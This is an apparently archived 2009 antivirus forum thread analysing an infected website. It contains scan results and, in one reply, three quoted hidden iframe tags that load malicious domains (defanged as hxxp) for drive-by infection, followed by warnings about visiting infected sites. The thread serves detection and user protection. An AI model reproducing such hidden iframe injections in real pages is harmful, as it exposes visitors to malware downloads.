Author Topic: nasha-russia.tv - HTML:Iframe-inf  (Read 9039 times)

0 Members and 2 Guests are viewing this topic.

sewaq

  • Guest
nasha-russia.tv - HTML:Iframe-inf
« on: April 29, 2009, 01:27:06 PM »
hxxp://nasha-russia.tv/

Offline Omid Farhang

  • Frontend Developer
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 1660
  • I wish I could write longer personal text!!
    • Homepage
Re: nasha-russia.tv - HTML:Iframe-inf
« Reply #1 on: April 29, 2009, 01:35:27 PM »
A virus or unwanted program has been detected
in the HTTP data on the requested page.

Requested URL:   hxxp://nasha-russia.tv/
Information:        Contains recognition pattern of the HTML/Infected.WebPage.Gen HTML script virus
Twitter: OmidFarhangEn - OS: Manjaro KDE

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Re: nasha-russia.tv - HTML:Iframe-inf
« Reply #2 on: April 29, 2009, 09:56:25 PM »
Hi sewaq,

DrWeb's av link checker gives it as red - infected -
Checking: hxtp://nasha-russia.tv/
Engine version: 5.0.0.12182
Total virus-finding records: 539455
File size: 45.05 KB
File MD5: 4c7dd71d5934d7cab5a3aeefe3dfd339

hxtp://nasha-russia.tv/ - archive HTML
>hxttp://nasha-russia.tv//JavaScript.0 - Ok
>hxtp://nasha-russia.tv//Script.1 - Ok
>hxtp://nasha-russia.tv//Script.2 - Ok
>hxtp://nasha-russia.tv//Script.3 - Ok
>hxtp://nasha-russia.tv//Script.4 - Ok
>hxtp://nasha-russia.tv//Script.5 - Ok
>hxtp://nasha-russia.tv//JavaScript.6 - Ok
>hxtp://nasha-russia.tv//JavaScript1.1.7 - Ok
>hxtp://nasha-russia.tv//JavaScript1.2.8 - Ok
>hxtp://nasha-russia.tv//JavaScript1.3.9 - Ok
>hxtp://nasha-russia.tv//JavaScript.10 - Ok
>hxtp://nasha-russia.tv//JavaScript.11 - Ok
hxtp://nasha-russia.tv/ - Ok

Checking: hxtp://pagead2.googlesyndication.com/pagead/show_ads.js
File size: 29.44 KB
File MD5: 24c7aba78e61147132b46e48e6743e71

hxtp://pagead2.googlesyndication.com/pagead/show_ads.js - Ok

Checking: hxtp://lotbetworld.cn/in.cgi?income36
File size: 8978 bytes
File MD5: 98ccf1db761c14c99d26177ac88722b1

hxtp://lotbetworld.cn/in.cgi?income36 - archive MAIL
xttp://lotbetworld.cn/in.cgi?income36/ - archive HTML
>hxtp://lotbetworld.cn/in.cgi?income36//Script.0 infected with Trojan.DownLoad.35036

Checking: hxtp://nasha-russia.tv/includes/jscript.js
File size: 2849 bytes
File MD5: 50f24195e48db586910fffb5f7f5a614

hxtp://nasha-russia.tv/includes/jscript.js - Ok
Re: hxtp://virusinfo.info/showthread.php?t=44061

polonus
« Last Edit: April 29, 2009, 10:00:17 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

CharleyO

  • Guest
Re: nasha-russia.tv - HTML:Iframe-inf
« Reply #3 on: April 29, 2009, 10:12:28 PM »
***

Well, Polonus beat me to it but here is a little more information.

One iframe infection is outside the html tag at the top of the page and looks like this :

<iframe src="hxxp://lotbetworld.cn/in.cgi?income36" width=1 height=1 style="visibility: hidden"></iframe>
(I changed the http to hxxp to disable the link)

I counted at least 12 javascript infections through out the page.

There are 2 more iframe infections outside the html tag at the bottom of the page :

<iframe src="hxxp://google-ana1yticz.com/?click=486812" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
<iframe src="hxxp://lotbetworld.cn/in.cgi?income36" width=1 height=1 style="visibility: hidden"></iframe>

Click the images below to enlarge.


***
« Last Edit: April 29, 2009, 10:15:52 PM by CharleyO »

Offline !Donovan

  • Web Analyst
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 2219
    • The WAR Against Malware
Re: nasha-russia.tv - HTML:Iframe-inf
« Reply #4 on: April 29, 2009, 10:36:53 PM »
Went to the site without pro version and got infected. :-X
Familiarize Yourself! | Educate Yourself! | Beautify Yourself! | Scan Yourself!
"People who say it cannot be done should not interrupt those who are doing it."

CharleyO

  • Guest
Re: nasha-russia.tv - HTML:Iframe-inf
« Reply #5 on: April 30, 2009, 12:52:59 AM »
***

Since Polonus and I had already checked it out, why did you go there?    ???

We already said it was infected. You need a little more experience before doing such things.


***

Offline !Donovan

  • Web Analyst
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 2219
    • The WAR Against Malware
Re: nasha-russia.tv - HTML:Iframe-inf
« Reply #6 on: April 30, 2009, 02:16:20 AM »
***

Since Polonus and I had already checked it out, why did you go there?    ???

We already said it was infected. You need a little more experience before doing such things.


***

I wanted to see what the virus does. ;D Besides, I think I can remove the virus vai Boot-Time Scanning!
Familiarize Yourself! | Educate Yourself! | Beautify Yourself! | Scan Yourself!
"People who say it cannot be done should not interrupt those who are doing it."

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Re: nasha-russia.tv - HTML:Iframe-inf
« Reply #7 on: April 30, 2009, 02:32:31 AM »
Hi Donovansrb10,

People that download viruses to see what they do aren't just average users. These people download viruses in a special lab settings, where they cannot infect outside a virtual machine. They have to take a lot of precautions and need a lot of special analyzing tools. Well if you download Vitro file infector, you can see what is meant, if you do that you can completely f-disk, format and re-install your Operational System, so-called total recall, not a nice thing to experience, seeing your computer being ruined by a virus. Malware is no plaything, and malware should be kept from computers by all means. The real hero here is the man or woman or kid that did not have a virus for years and years, because he or she or it is computer-savvy and security aware,

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 88895
  • No support PMs thanks
Re: nasha-russia.tv - HTML:Iframe-inf
« Reply #8 on: April 30, 2009, 03:19:46 AM »
That goes double when you have absolutely no idea what the payload at the other end of the link could be.

One member who I would also say is more experienced tried this and with out a robust back-up and recovery strategy (hard disk imaging, etc.) he ended formatting his system and reinstalling everything. What he got hit by was Vitro/Virut and you only have to check this forum to see the destruction it reaps with most ending up on a fdisk, format and reinstall.

So this strategy is IMHO totally stupid, unless you are on a test machine that you wipe after the test.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.2.6105 (build 24.2.8918.824) UI 1.0.799/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security